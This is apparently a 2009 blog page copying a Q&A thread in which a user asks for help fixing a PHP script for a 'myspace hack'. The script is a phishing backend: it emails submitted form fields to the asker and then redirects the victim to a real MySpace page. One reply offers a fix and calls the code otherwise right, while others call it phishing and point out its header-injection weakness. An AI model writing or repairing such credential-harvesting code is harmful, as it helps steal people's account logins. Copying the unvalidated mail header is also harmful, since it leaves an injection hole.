Wednesday, November 25, 2009

Is this the right sendmail php for a myspace hack?

I have my own site and everything seems to be working except it does not send me an email. wut is wrong?, will post the index php if necessary and my email is hiyohi55@yahoo.com



%26lt;?



$email = $_REQUEST['email'] ;



$message = $_REQUEST['message'] ;



mail( "hiyohi55@yahoo.com", "Feedback Form Results",



$message, "From: $email" );



header( "Location: http://viewmorepics.myspace.com/index.cf... );



?%26gt;



Is this the right sendmail php for a myspace hack?

instead of using $_REQUEST use $_POST or $_GET



except that ur all code is right



Is this the right sendmail php for a myspace hack?

Amazing. My answer is the right one, but he admittedly votes a wrong answer as best. More proof that MySpace is subtracting from the sum of human knowledge. Report It



Is this the right sendmail php for a myspace hack?

btw this isn't hacking, more like phising Report It



Is this the right sendmail php for a myspace hack?

How dumb do you have to be to put your email on here while asking for help on hacking?



BTW, you don't have to use php. Just make normal form in HTML.



Is this the right sendmail php for a myspace hack?

Probably your host has disabled the PHP mail() function because of bad scripts such as this, which don't check for injection or termination attacks.



That's especially likely if you are using a free host.

No comments:

Post a Comment

 
Ltd